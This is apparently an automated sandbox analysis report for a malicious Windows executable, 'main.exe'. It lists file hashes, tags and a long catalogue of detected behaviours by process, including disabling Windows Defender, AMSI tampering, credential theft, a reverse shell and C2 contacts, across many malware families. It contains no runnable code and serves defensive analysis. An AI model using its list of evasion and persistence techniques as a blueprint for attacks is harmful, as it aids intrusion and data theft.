File name:

main.exe

Full analysis: https://app.any.run/tasks/5ed1818c-5dda-48d9-beb9-72b97e4a859a
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Analysis date: June 20, 2025, 22:37:57
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
python
loader
github
meterpreter
backdoor
payload
metasploit
auto
generic
modiloader
rat
asyncrat
formbook
stealer
remcos
dbatloader
koiloader
havoc
phorpiex
dcrat
lumma
redline
resolverrat
njrat
stormkitty
telegram
networm
amus
evasion
neshta
stealerium
metastealer
pyinstaller
agenttesla
coinminer
miner
bladabindi
vidar
quasar
irc
ghostsocks
proxyware
remote
xworm
stealc
snake
keylogger
screenconnect
rmm-tool
arch-doc
koistealer
koi
ftp
exfiltration
ims-api
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (console) x86-64, for MS Windows, 7 sections
MD5:

C942A56638772644D847709D906FA23D

SHA1:

12D6B77FEC2244CDC4050A083AA741185CC48010

SHA256:

56A28391D309102557FCF9BC34351A50B49054282F2007851DCBC4E825E7C37A

SSDEEP:

98304:R/0Cg6brcfRkzKVfq7AnYRO4Y6ZhkDQet54netUjZUj0vNQLFZfQpyJoic3yjHFD:ivfkEwE1MUQ881mw02/ki+BIsG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 6380)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2520)
      • powershell.exe (PID: 7632)
      • powershell.exe (PID: 7648)
      • powershell.exe (PID: 7660)
      • powershell.exe (PID: 8252)
      • powershell.exe (PID: 8540)
      • powershell.exe (PID: 8696)
      • powershell.exe (PID: 8776)
      • powershell.exe (PID: 8896)
      • powershell.exe (PID: 9040)
      • powershell.exe (PID: 10724)
      • powershell.exe (PID: 11124)
      • powershell.exe (PID: 11116)
      • powershell.exe (PID: 11132)
      • powershell.exe (PID: 11184)
      • powershell.exe (PID: 11200)
      • powershell.exe (PID: 9268)
      • powershell.exe (PID: 9968)
      • powershell.exe (PID: 11556)
      • powershell.exe (PID: 11588)
      • powershell.exe (PID: 10176)
      • powershell.exe (PID: 14632)
      • powershell.exe (PID: 9228)
    • Changes powershell execution policy (Bypass)

      • main.exe (PID: 5084)
      • powershell.exe (PID: 2520)
      • werefult.exe (PID: 8760)
      • cmd.exe (PID: 15244)
    • Antivirus name has been found in the command line (generic signature)

      • bitdefender.exe (PID: 6812)
      • cmd.exe (PID: 15352)
    • Executing a file with an untrusted certificate

      • 4eDsFzc.exe (PID: 7472)
      • EG11t89.exe (PID: 10540)
      • tomcat8.exe (PID: 10712)
      • protect.oxcy.666.exe (PID: 9252)
      • protect.oxcy.666.exe (PID: 11528)
      • vjVPnDfx.exe (PID: 11732)
      • reseptionProvider.exe (PID: 11784)
      • protect.oxcy.666.exe (PID: 14512)
      • protect.oxcy.666.exe (PID: 15304)
    • ASYNCRAT has been found (auto)

      • main.exe (PID: 5084)
    • Changes the autorun value in the registry

      • loader.exe (PID: 7912)
      • WindowsUpdateLauncher.exe (PID: 8768)
      • runtimebroker.exe (PID: 8736)
      • klass.exe (PID: 8496)
      • ls.exe (PID: 9896)
      • winsvchost.exe (PID: 10188)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 10180)
      • AdobeART.exe (PID: 4804)
      • tzcyberninja.exe (PID: 9528)
      • explorer.exe (PID: 10604)
      • Adobe.exe (PID: 12412)
      • Cp1N8fC.exe (PID: 8976)
      • syspool.exe (PID: 11792)
      • ctfmon.exe (PID: 12492)
      • rmd_en_1.exe (PID: 11912)
      • rod_en_1.exe (PID: 11620)
      • rxd_en_1.exe (PID: 11224)
      • Amus.exe (PID: 11880)
      • Axam.a.exe (PID: 12436)
      • 90.exe (PID: 10852)
      • msconfig.exe (PID: 15032)
      • WhQMcgn.exe (PID: 9104)
      • ffdf.exe (PID: 12444)
      • Bloxflip%20Predictor.exe (PID: 10692)
      • Axam.exe (PID: 14468)
      • Axam.exe (PID: 8032)
      • Axam.exe (PID: 13896)
      • Axam.exe (PID: 7004)
      • Axam.exe (PID: 8960)
      • Axam.exe (PID: 15580)
      • Axam.exe (PID: 15096)
      • Axam.exe (PID: 14292)
      • Axam.exe (PID: 15500)
      • Axam.exe (PID: 10688)
      • Axam.exe (PID: 16136)
      • Axam.exe (PID: 15748)
      • Axam.exe (PID: 7608)
      • dnd_x86.exe (PID: 15496)
    • Registers / Runs the DLL via REGSVR32.EXE

      • loader.exe (PID: 7912)
      • WindowsUpdateLauncher.exe (PID: 8768)
      • runtimebroker.exe (PID: 8736)
    • KOILOADER has been found (auto)

      • main.exe (PID: 5084)
    • FORMBOOK has been found (auto)

      • main.exe (PID: 5084)
    • GENERIC has been found (auto)

      • main.exe (PID: 5084)
      • main.exe (PID: 5084)
      • Ganja177.exe (PID: 8928)
      • Ganja54.exe (PID: 8704)
      • Ganja20.exe (PID: 9788)
      • main.exe (PID: 5084)
      • main.exe (PID: 5084)
      • main.exe (PID: 5084)
      • main.exe (PID: 5084)
      • syspool.exe (PID: 11792)
      • Amus.exe (PID: 11880)
      • cabal.exe (PID: 11952)
      • ganja5.exe (PID: 9444)
    • Runs injected code in another process

      • transformer.exe (PID: 8204)
      • sosi.exe (PID: 8532)
    • Application was injected by another process

      • explorer.exe (PID: 4772)
    • DBATLOADER has been found (auto)

      • lol.exe (PID: 9004)
      • test1.exe (PID: 10368)
    • NJRAT has been found (auto)

      • main.exe (PID: 5084)
      • Bloxflip%20Predictor.exe (PID: 10692)
    • PHORPIEX has been found (auto)

      • kajmak.exe (PID: 9756)
    • LUMMA has been found (auto)

      • main.exe (PID: 5084)
    • STORMKITTY has been found (auto)

      • main.exe (PID: 5084)
    • METASPLOIT has been detected (SURICATA)

      • main.exe (PID: 5084)
    • METERPRETER has been detected (SURICATA)

      • main.exe (PID: 5084)
    • MODILOADER mutex has been found

      • AdobeART.exe (PID: 4804)
      • 90.exe (PID: 10852)
    • Create files in the Startup directory

      • b7VRzCg.exe (PID: 8784)
      • tzcyberninja.exe (PID: 9528)
      • Axam.a.exe (PID: 12436)
      • bot.exe (PID: 11004)
      • ffdf.exe (PID: 12444)
      • setup.exe (PID: 5612)
    • DCRAT mutex has been found

      • startud.exe (PID: 8196)
    • STEALERIUM has been found (auto)

      • plctkles.exe (PID: 8240)
    • Uses Task Scheduler to run other applications

      • tzcyberninja.exe (PID: 9528)
      • dnd_x86.exe (PID: 15496)
    • NETWORM mutex has been found

      • Amus.exe (PID: 11880)
    • NESHTA mutex has been found

      • setup.exe (PID: 11548)
      • setup.exe (PID: 10400)
      • setup.exe (PID: 5612)
    • REDLINE has been detected (SURICATA)

      • cc.exe (PID: 12016)
    • Connects to the CnC server

      • cc.exe (PID: 12016)
      • abokiii55%205.exe (PID: 8672)
      • svchost.exe (PID: 2200)
      • svc.exe (PID: 11304)
      • powershell.exe (PID: 8540)
      • powershell.exe (PID: 8252)
    • METASTEALER has been detected (SURICATA)

      • cc.exe (PID: 12016)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 10176)
      • powershell.exe (PID: 14632)
    • NJRAT mutex has been found

      • Bloxflip%20Predictor.exe (PID: 10692)
    • Adds path to the Windows Defender exclusion list

      • ap.exe (PID: 8460)
      • protect.oxcy.666.exe (PID: 14512)
      • EG11t89.exe (PID: 10540)
      • ZwMTvdkS2rnf9Im.exe (PID: 11036)
      • cmd.exe (PID: 14268)
    • REMCOS has been found (auto)

      • ap.exe (PID: 8460)
    • Actions looks like stealing of personal data

      • MSBuild.exe (PID: 11516)
      • MARCUSS.exe (PID: 8752)
      • freeman.com (PID: 12820)
      • svc.exe (PID: 11304)
      • obii55%205.exe (PID: 15020)
      • cc.exe (PID: 12016)
    • Steals credentials from Web Browsers

      • MSBuild.exe (PID: 11516)
      • cc.exe (PID: 12016)
      • MARCUSS.exe (PID: 8752)
      • freeman.com (PID: 12820)
      • obii55%205.exe (PID: 15020)
    • QUASAR mutex has been found

      • Client-built.exe (PID: 11636)
    • REMCOS mutex has been found

      • abokiii55%205.exe (PID: 8672)
    • REMCOS has been detected

      • abokiii55%205.exe (PID: 8672)
      • abokiii55%205.exe (PID: 8672)
    • IRC has been detected (SURICATA)

      • ctfmon.exe (PID: 14232)
    • LUMMA has been detected (SURICATA)

      • svchost.exe (PID: 2200)
      • MSBuild.exe (PID: 15624)
      • MSBuild.exe (PID: 15816)
    • XWORM has been detected (SURICATA)

      • b7VRzCg.exe (PID: 8784)
      • regsvr32.exe (PID: 9116)
    • STEALC has been detected

      • MSBuild.exe (PID: 12932)
    • REMCOS has been detected (SURICATA)

      • abokiii55%205.exe (PID: 8672)
    • QUASAR has been detected (SURICATA)

      • Client-built.exe (PID: 11636)
    • SNAKEKEYLOGGER has been detected (SURICATA)

      • obii55%205.exe (PID: 15020)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 7648)
      • powershell.exe (PID: 9040)
      • TAMISEMI_VYUO_VYA_UMMA.pdf.exe (PID: 8152)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 8696)
      • powershell.exe (PID: 7648)
      • powershell.exe (PID: 8252)
      • powershell.exe (PID: 8540)
    • Changes Windows Defender settings

      • cmd.exe (PID: 14268)
      • cmd.exe (PID: 15352)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 8776)
    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 8520)
    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 8520)
    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 8520)
    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 8520)
    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 8520)
    • Changes settings for real-time protection

      • powershell.exe (PID: 8520)
    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 8520)
    • KOI has been detected (SURICATA)

      • powershell.exe (PID: 8252)
      • powershell.exe (PID: 8540)
    • Stealers network behavior

      • MARCUSS.exe (PID: 8752)
    • AGENTTESLA has been detected (SURICATA)

      • MARCUSS.exe (PID: 8752)
  • SUSPICIOUS

    • The process drops C-runtime libraries

      • main.exe (PID: 6212)
      • protect.oxcy.666.exe (PID: 9252)
      • protect.oxcy.666.exe (PID: 11528)
      • dnd.exe (PID: 12224)
    • Process drops python dynamic module

      • main.exe (PID: 6212)
      • protect.oxcy.666.exe (PID: 9252)
      • protect.oxcy.666.exe (PID: 11528)
      • dnd.exe (PID: 12224)
    • Executable content was dropped or overwritten

      • main.exe (PID: 6212)
      • main.exe (PID: 5084)
      • loader.exe (PID: 7912)
      • Ganja177.exe (PID: 8928)
      • Ganja54.exe (PID: 8704)
      • lol.exe (PID: 9004)
      • Ganja46.exe (PID: 9540)
      • CryptoLocker.exe (PID: 9684)
      • kajmak.exe (PID: 9756)
      • Ganja66.exe (PID: 9776)
      • Ganja20.exe (PID: 9788)
      • Prolin.exe (PID: 9492)
      • test1.exe (PID: 10368)
      • b7VRzCg.exe (PID: 8784)
      • tzcyberninja.exe (PID: 9528)
      • explorer.exe (PID: 10604)
      • setup.exe (PID: 5612)
      • setup.exe (PID: 10400)
      • protect.oxcy.666.exe (PID: 9252)
      • protect.oxcy.666.exe (PID: 11528)
      • set-2%20firmware%204.01.exe (PID: 12460)
      • dnd.exe (PID: 12224)
      • setup.exe (PID: 11548)
      • joker12321.exe (PID: 11232)
      • Cp1N8fC.exe (PID: 8976)
      • syspool.exe (PID: 11792)
      • ctfmon.exe (PID: 12492)
      • rxd_en_1.exe (PID: 11224)
      • rmd_en_1.exe (PID: 11912)
      • porn.exe (PID: 11596)
      • 123.exe (PID: 10684)
      • rod_en_1.exe (PID: 11620)
      • Amus.exe (PID: 11880)
      • Axam.a.exe (PID: 12436)
      • index.exe (PID: 11216)
      • setup.exe(Live%20Protection%20Suite).exe (PID: 11240)
      • setup.exe (PID: 14580)
      • RMO_SE~2.EXE (PID: 14888)
      • yc.exe (PID: 11752)
      • is-4HI07.tmp (PID: 10924)
      • is-NC47T.tmp (PID: 14616)
      • Terminal.exe (PID: 13608)
      • Bloxflip%20Predictor.exe (PID: 10692)
      • ap.exe (PID: 8460)
      • bot.exe (PID: 11004)
      • ffdf.exe (PID: 12444)
      • EG11t89.exe (PID: 10540)
      • cabal.exe (PID: 11952)
      • ganja5.exe (PID: 9444)
      • dnd.exe (PID: 6796)
      • ZwMTvdkS2rnf9Im.exe (PID: 11036)
      • csc.exe (PID: 12260)
      • rundll32.exe (PID: 9736)
      • csc.exe (PID: 10668)
      • csc.exe (PID: 15008)
      • csc.exe (PID: 10504)
      • powershell.exe (PID: 8776)
      • dnd_x86.exe (PID: 15496)
      • csc.exe (PID: 10328)
    • Application launched itself

      • main.exe (PID: 6212)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 10180)
      • 90.exe (PID: 11012)
      • protect.oxcy.666.exe (PID: 9252)
      • protect.oxcy.666.exe (PID: 11528)
      • powershell.exe (PID: 2520)
      • dnd.exe (PID: 12224)
      • obii55%205.exe (PID: 11936)
      • abokiii55%205.exe (PID: 11764)
    • Process drops legitimate windows executable

      • main.exe (PID: 6212)
      • main.exe (PID: 5084)
      • protect.oxcy.666.exe (PID: 9252)
      • protect.oxcy.666.exe (PID: 11528)
      • dnd.exe (PID: 12224)
      • joker12321.exe (PID: 11232)
      • is-NC47T.tmp (PID: 14616)
      • is-4HI07.tmp (PID: 10924)
      • ffdf.exe (PID: 12444)
      • cabal.exe (PID: 11952)
    • Starts CMD.EXE for commands execution

      • main.exe (PID: 5084)
      • 4eDsFzc.exe (PID: 7472)
      • Bugsoft.exe (PID: 11972)
      • hersey.exe (PID: 11192)
      • yc.exe (PID: 11752)
      • protect.oxcy.666.exe (PID: 14512)
      • dnd.exe (PID: 6796)
    • Loads Python modules

      • main.exe (PID: 5084)
      • dnd.exe (PID: 6796)
    • The process executes Powershell scripts

      • main.exe (PID: 5084)
    • Starts POWERSHELL.EXE for commands execution

      • main.exe (PID: 5084)
      • powershell.exe (PID: 2520)
      • f.exe (PID: 8712)
      • werefult.exe (PID: 8760)
      • MSBuild.exe (PID: 11516)
      • 1.exe (PID: 8836)
      • cmd.exe (PID: 15244)
      • cmd.exe (PID: 14268)
      • cmd.exe (PID: 15352)
    • Reads security settings of Internet Explorer

      • bitdefender.exe (PID: 6812)
      • 4eDsFzc.exe (PID: 7472)
      • safefinder.exe (PID: 8304)
      • lol.exe (PID: 9004)
      • TAMISEMI_VYUO_VYA_UMMA.pdf.exe (PID: 8152)
      • Adobe_plugin_Installer.exe (PID: 8720)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 10180)
      • 1.exe (PID: 8836)
      • CapCut-VideoEditing_12.1.02.exe (PID: 9512)
      • drivers.exe (PID: 10644)
      • MSBuild.exe (PID: 11516)
      • setup.exe (PID: 11548)
      • cabal.exe (PID: 11952)
      • joker12321.exe (PID: 11232)
      • index.exe (PID: 11216)
      • setup.exe(Live%20Protection%20Suite).exe (PID: 11240)
      • hersey.exe (PID: 11192)
      • ap.exe (PID: 8460)
      • yc.exe (PID: 11752)
      • Bloxflip%20Predictor.exe (PID: 10692)
      • Assiah.exe (PID: 11272)
      • Cp1N8fC.exe (PID: 8976)
      • 123.exe (PID: 10684)
      • WhQMcgn.exe (PID: 9104)
      • EG11t89.exe (PID: 10540)
      • ZwMTvdkS2rnf9Im.exe (PID: 11036)
      • ganja5.exe (PID: 9444)
      • ffdf.exe (PID: 12444)
      • MSBuild.exe (PID: 12932)
      • svc.exe (PID: 11304)
      • freeman.com (PID: 12820)
    • Process requests binary or script from the Internet

      • main.exe (PID: 5084)
      • cabal.exe (PID: 11952)
    • Reads Microsoft Outlook installation path

      • bitdefender.exe (PID: 6812)
    • The process checks if it is being run in the virtual environment

      • main.exe (PID: 5084)
      • comdgpx.exe (PID: 8296)
      • WindowsUpdateLauncher.exe (PID: 8768)
      • runtimebroker.exe (PID: 8736)
    • Connects to unusual port

      • main.exe (PID: 5084)
      • Worldoffice.exe (PID: 6412)
      • Worldofficee.exe (PID: 6532)
      • payload.exe (PID: 8908)
      • winsvchost.exe (PID: 10188)
      • AdobeART.exe (PID: 4804)
      • march.exe (PID: 9716)
      • b7VRzCg.exe (PID: 8784)
      • demon.exe (PID: 9692)
      • tzcyberninja.exe (PID: 9528)
      • https.exe (PID: 9744)
      • startud.exe (PID: 8196)
      • Adobe.exe (PID: 12412)
      • cc.exe (PID: 12016)
      • svchost.exe (PID: 11248)
      • tcp_windows_amd64.exe (PID: 11800)
      • shell.exe (PID: 11812)
      • Client-built.exe (PID: 11636)
      • Final123.exe (PID: 12468)
      • ctfmon.exe (PID: 14232)
      • Clien123.exe (PID: 10152)
      • c2_payload_aes.exe (PID: 9620)
      • abokiii55%205.exe (PID: 8672)
      • svchost.exe (PID: 13808)
      • svc.exe (PID: 11304)
      • cmd.exe (PID: 15244)
      • powershell.exe (PID: 7648)
      • MARCUSS.exe (PID: 8752)
    • Potential Corporate Privacy Violation

      • main.exe (PID: 5084)
      • plctkles.exe (PID: 8240)
      • WhQMcgn.exe (PID: 9104)
      • cabal.exe (PID: 11952)
    • The process creates files with name similar to system file names

      • loader.exe (PID: 7912)
      • main.exe (PID: 5084)
      • kajmak.exe (PID: 9756)
      • ctfmon.exe (PID: 12492)
      • yc.exe (PID: 11752)
      • dnd_x86.exe (PID: 15496)
    • Connects to the server without a host name

      • main.exe (PID: 5084)
      • plctkles.exe (PID: 8240)
      • cabal.exe (PID: 11952)
      • syspool.exe (PID: 11792)
      • MSBuild.exe (PID: 12932)
      • svc.exe (PID: 11304)
      • powershell.exe (PID: 8696)
      • powershell.exe (PID: 8252)
      • powershell.exe (PID: 8540)
    • Executing commands from a ".bat" file

      • 4eDsFzc.exe (PID: 7472)
      • main.exe (PID: 5084)
      • Bugsoft.exe (PID: 11972)
      • hersey.exe (PID: 11192)
      • yc.exe (PID: 11752)
    • Starts itself from another location

      • Ganja177.exe (PID: 8928)
      • Ganja54.exe (PID: 8704)
      • Ganja46.exe (PID: 9540)
      • CryptoLocker.exe (PID: 9684)
      • kajmak.exe (PID: 9756)
      • Ganja66.exe (PID: 9776)
      • Ganja20.exe (PID: 9788)
      • lol.exe (PID: 9004)
      • ganja2.exe (PID: 10020)
      • test1.exe (PID: 10368)
      • ctfmon.exe (PID: 12492)
      • Ganja121.exe (PID: 10356)
    • Starts a Microsoft application from unusual location

      • v999f8.exe (PID: 9500)
      • rxd_en_1.exe (PID: 11224)
      • protect.oxcy.666.exe (PID: 9252)
      • protect.oxcy.666.exe (PID: 11528)
      • ME3_setup.exe (PID: 11572)
      • cron123213321.exe (PID: 11772)
      • rod_en_1.exe (PID: 11620)
      • llll.exe (PID: 11676)
      • cryptedcron121221.exe (PID: 11920)
      • alex123123.exe (PID: 11992)
      • ffdf.exe (PID: 12444)
      • rmd_en_1.exe (PID: 11912)
      • neploskiy_crypted_LAB.exe (PID: 12008)
      • set-2%20firmware%204.01.exe (PID: 12460)
      • nxTpPrk.exe (PID: 12744)
      • protect.oxcy.666.exe (PID: 14512)
      • protect.oxcy.666.exe (PID: 15304)
    • Contacting a server suspected of hosting an Exploit Kit

      • main.exe (PID: 5084)
    • Creates file in the systems drive root

      • Prolin.exe (PID: 9492)
      • setup.exe (PID: 5612)
      • setup.exe (PID: 10400)
      • Amus.exe (PID: 11880)
      • setup.exe (PID: 11548)
      • Axam.a.exe (PID: 12436)
      • Axam.exe (PID: 14468)
      • Axam.exe (PID: 8032)
      • Axam.exe (PID: 13896)
      • Axam.exe (PID: 7004)
      • Axam.exe (PID: 8960)
      • Axam.exe (PID: 15580)
      • Axam.exe (PID: 14292)
      • Axam.exe (PID: 15500)
      • Axam.exe (PID: 10688)
      • Axam.exe (PID: 15096)
      • Axam.exe (PID: 16136)
      • Axam.exe (PID: 15748)
      • Axam.exe (PID: 7608)
      • ceng.exe (PID: 12428)
      • attrib.exe (PID: 14628)
      • cmd.exe (PID: 10672)
    • Uses ATTRIB.EXE to modify file attributes

      • f.exe (PID: 8712)
      • werefult.exe (PID: 8760)
      • Bloxflip%20Predictor.exe (PID: 10692)
      • cmd.exe (PID: 10672)
    • Block-list domains

      • main.exe (PID: 5084)
    • Reads Internet Explorer settings

      • bitdefender.exe (PID: 6812)
    • Starts application with an unusual extension

      • main.exe (PID: 5084)
    • Working with threads in the GNU C Compiler (GCC) libraries related mutex has been found

      • hersey.exe (PID: 11192)
      • porn.exe (PID: 11596)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • main.exe (PID: 5084)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • MSBuild.exe (PID: 11516)
      • obii55%205.exe (PID: 15020)
      • MSBuild.exe (PID: 15624)
      • MSBuild.exe (PID: 15816)
    • Checks for external IP

      • Build.exe (PID: 11256)
      • svchost.exe (PID: 2200)
      • svchost.exe (PID: 13808)
      • MARCUSS.exe (PID: 8752)
      • obii55%205.exe (PID: 15020)
      • freeman.com (PID: 12820)
    • Executes application which crashes

      • Build.exe (PID: 11256)
      • jzQILRF.exe (PID: 14144)
    • Mutex name with non-standard characters

      • setup.exe (PID: 5612)
      • setup.exe (PID: 10400)
      • setup.exe (PID: 11548)
    • Changes the title of the Internet Explorer window

      • Amus.exe (PID: 11880)
    • Changes the Home page of Internet Explorer

      • Amus.exe (PID: 11880)
    • Drops 7-zip archiver for unpacking

      • index.exe (PID: 11216)
      • cabal.exe (PID: 11952)
    • Starts NET.EXE to display or manage information about active sessions

      • cmd.exe (PID: 9208)
      • net.exe (PID: 2280)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 2520)
    • Executes script without checking the security policy

      • powershell.exe (PID: 10176)
    • The process hide an interactive prompt from the user

      • powershell.exe (PID: 2520)
      • MSBuild.exe (PID: 11516)
    • Found IP address in command line

      • powershell.exe (PID: 10176)
    • Potential TCP-based PowerShell reverse shell connection

      • powershell.exe (PID: 2520)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 2520)
      • werefult.exe (PID: 8760)
      • MSBuild.exe (PID: 11516)
      • cmd.exe (PID: 15244)
    • Searches for installed software

      • MSBuild.exe (PID: 11516)
    • Reads the date of Windows installation

      • Cp1N8fC.exe (PID: 8976)
      • 123.exe (PID: 10684)
      • jzQILRF.exe (PID: 14144)
      • WhQMcgn.exe (PID: 9104)
      • ganja5.exe (PID: 9444)
      • ffdf.exe (PID: 12444)
    • BASE64 encoded PowerShell command has been detected

      • MSBuild.exe (PID: 11516)
      • cmd.exe (PID: 15244)
    • Base64-obfuscated command line is found

      • MSBuild.exe (PID: 11516)
      • cmd.exe (PID: 15244)
    • Found strings related to reading or modifying Windows Defender settings

      • protect.oxcy.666.exe (PID: 14512)
    • Get information on the list of running processes

      • protect.oxcy.666.exe (PID: 14512)
      • cmd.exe (PID: 10696)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 12260)
      • csc.exe (PID: 10504)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 9040)
    • Contacting a server suspected of hosting an CnC

      • svchost.exe (PID: 2200)
      • b7VRzCg.exe (PID: 8784)
      • abokiii55%205.exe (PID: 8672)
      • regsvr32.exe (PID: 9116)
      • Client-built.exe (PID: 11636)
      • svc.exe (PID: 11304)
      • MSBuild.exe (PID: 15624)
      • MSBuild.exe (PID: 15816)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7632)
      • powershell.exe (PID: 9040)
      • powershell.exe (PID: 8776)
      • powershell.exe (PID: 7648)
      • powershell.exe (PID: 11184)
      • powershell.exe (PID: 11588)
    • Executes as Windows Service

      • VSSVC.exe (PID: 10228)
    • The process verifies whether the antivirus software is installed

      • cmd.exe (PID: 8244)
      • obii55%205.exe (PID: 15020)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 16212)
    • Changes AMSI initialization state that disables detection systems (POWERSHELL)

      • powershell.exe (PID: 9040)
    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 9040)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 8116)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 14268)
    • The executable file from the user directory is run by the CMD process

      • dnd_x86.exe (PID: 15496)
    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 15352)
    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 15352)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 8776)
    • Connects to FTP

      • MARCUSS.exe (PID: 8752)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 7372)
  • INFO

    • The sample compiled with english language support

      • main.exe (PID: 6212)
      • main.exe (PID: 5084)
      • Prolin.exe (PID: 9492)
      • setup.exe (PID: 5612)
      • setup.exe (PID: 10400)
      • protect.oxcy.666.exe (PID: 9252)
      • protect.oxcy.666.exe (PID: 11528)
      • dnd.exe (PID: 12224)
      • setup.exe (PID: 11548)
      • joker12321.exe (PID: 11232)
      • rmd_en_1.exe (PID: 11912)
      • 123.exe (PID: 10684)
      • rod_en_1.exe (PID: 11620)
      • Amus.exe (PID: 11880)
      • index.exe (PID: 11216)
      • Axam.a.exe (PID: 12436)
      • setup.exe (PID: 14580)
      • RMO_SE~2.EXE (PID: 14888)
      • is-NC47T.tmp (PID: 14616)
      • is-4HI07.tmp (PID: 10924)
      • ffdf.exe (PID: 12444)
      • cabal.exe (PID: 11952)
    • Checks supported languages

      • main.exe (PID: 6212)
      • main.exe (PID: 5084)
      • bitdefender.exe (PID: 6812)
      • Worldofficee.exe (PID: 6532)
      • Worldoffice.exe (PID: 6412)
      • WxWorkMultiOpen.exe (PID: 7208)
      • lollo.exe (PID: 7184)
      • agent.exe (PID: 6732)
      • 4eDsFzc.exe (PID: 7472)
      • loader.exe (PID: 7912)
      • TAMISEMI_VYUO_VYA_UMMA.pdf.exe (PID: 8152)
      • startud.exe (PID: 8196)
      • WxWorkMultiOpen.exe (PID: 7936)
      • WxWorkMultiOpen.exe (PID: 7892)
      • WxWorkMultiOpen.exe (PID: 7844)
      • transformer.exe (PID: 8204)
      • comdgpx.exe (PID: 8296)
      • plctkles.exe (PID: 8240)
      • ap.exe (PID: 8460)
      • sosi.exe (PID: 8532)
      • safefinder.exe (PID: 8304)
      • Ganja54.exe (PID: 8704)
      • Client.exe (PID: 7996)
      • Ganja61.exe (PID: 8920)
      • WindowsUpdateLauncher.exe (PID: 8768)
      • f.exe (PID: 8712)
      • Ganja177.exe (PID: 8928)
      • LOIC.exe (PID: 8680)
      • werefult.exe (PID: 8760)
      • MARCUSS.exe (PID: 8752)
      • 80aK2YmFb6vbKeU.exe (PID: 8744)
      • Cp1N8fC.exe (PID: 8976)
      • payload.exe (PID: 8908)
      • lol.exe (PID: 9004)
      • installer.exe (PID: 8688)
      • Ganja180.exe (PID: 8728)
      • b7VRzCg.exe (PID: 8784)
      • Adobe_plugin_Installer.exe (PID: 8720)
      • klass.exe (PID: 8496)
      • msconfig.exe (PID: 8316)
      • runtimebroker.exe (PID: 8736)
      • jtEmt5nxbRnq5jC.exe (PID: 8824)
      • Ganja151.exe (PID: 9428)
      • ganja5.exe (PID: 9444)
      • Prolin.exe (PID: 9492)
      • Ganja132.exe (PID: 9284)
      • Ganja46.exe (PID: 9540)
      • CapCut-VideoEditing_12.1.02.exe (PID: 9512)
      • https.exe (PID: 9744)
      • Ganja66.exe (PID: 9776)
      • kajmak.exe (PID: 9756)
      • Ganja20.exe (PID: 9788)
      • march.exe (PID: 9716)
      • demonx64.exe (PID: 9704)
      • WxWorkMultiOpen.exe (PID: 8792)
      • CryptoLocker.exe (PID: 9684)
      • ls.exe (PID: 9896)
      • 1.exe (PID: 8836)
      • Whisker.exe (PID: 8968)
      • DumpAADUserPRT.exe (PID: 8800)
      • demon.exe (PID: 9692)
      • winsvchost.exe (PID: 10188)
      • ls.exe (PID: 8884)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 10180)
      • lsssk.exe (PID: 9296)
      • AdobeART.exe (PID: 4804)
      • ganja2.exe (PID: 10020)
      • baboon.exe (PID: 9728)
      • v999f8.exe (PID: 9500)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 7524)
      • Ganja85.exe (PID: 8600)
      • CryptoWall.exe (PID: 10328)
      • WhQMcgn.exe (PID: 9104)
      • tzcyberninja.exe (PID: 9528)
      • Ganja121.exe (PID: 10356)
      • test1.exe (PID: 10368)
      • Ganja128.exe (PID: 10652)
      • msconfig.exe (PID: 10592)
      • EG11t89.exe (PID: 10540)
      • Ganja3.exe (PID: 10708)
      • Ganja35.exe (PID: 10840)
      • drivers.exe (PID: 10644)
      • Doppelganger.exe (PID: 9012)
      • Ganja90.exe (PID: 10772)
      • 123.exe (PID: 10684)
      • Bloxflip%20Predictor.exe (PID: 10692)
      • Ganja45.exe (PID: 10664)
      • 90.exe (PID: 11012)
      • Ganja154.exe (PID: 10960)
      • trip.exe (PID: 11208)
      • Ganja39.exe (PID: 10740)
      • Ganja107.exe (PID: 10732)
      • bot.exe (PID: 11004)
      • index.exe (PID: 11216)
      • Ganja49.exe (PID: 10700)
      • rxd_en_1.exe (PID: 11224)
      • Ganja190.exe (PID: 11024)
      • joker12321.exe (PID: 11232)
      • ZwMTvdkS2rnf9Im.exe (PID: 11036)
      • Anap.a.exe (PID: 11140)
      • svchost.exe (PID: 11248)
